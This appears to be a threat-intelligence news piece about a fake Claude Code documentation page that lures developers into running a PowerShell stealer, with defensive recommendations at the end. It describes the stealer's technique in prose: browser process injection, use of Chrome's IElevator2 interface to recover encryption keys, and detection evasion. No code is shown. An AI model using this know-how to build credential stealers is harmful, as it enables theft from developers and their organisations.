Fake Claude Code Page Pushes PowerShell Stealer at Devs

The rise of counterfeit installation pages reflects a growing trend where threat actors weaponize developer‑focused tools to gain initial access. By mimicking the official Claude Code documentation and presenting a one‑line PowerShell command, the campaign lures developers searching for AI‑assisted coding assistants. Unlike typical malware that relies on obvious binaries, the malicious script appears clean to URL scanners, allowing it to slip past perimeter defenses that focus on known malicious payloads.

Technical analysis reveals a sophisticated two‑stage approach. The PowerShell loader, obfuscated and roughly 600 KB in size, enumerates all Chromium‑family browsers and injects a 4,608‑byte native helper directly into a live process. This helper leverages the newly introduced IElevator2 COM interface in Chrome 144 to retrieve the App‑Bound Encryption key, a method first seen in the Glove Stealer but refined to avoid any network or cryptographic imports. By confining observable activity—SQLite reads, archive creation and HTTPS exfiltration—to the PowerShell layer, the attackers sidestep behavioral rule sets that monitor native binaries in isolation.

For enterprises, the implications are stark. Developers often possess privileged access to source code repositories, CI/CD pipelines, and cloud credentials; a single compromised workstation can cascade into a full‑scale supply‑chain breach. The campaign’s region‑aware scheduled task further complicates detection, as it silently disables itself in high‑risk geographies. Defenders should enforce PowerShell Constrained Language Mode, enable comprehensive script block logging, and block newly registered domains resembling legitimate developer tools. Proactive web filtering and regular code‑signing verification can also reduce the attack surface, protecting both the development team and the broader organization.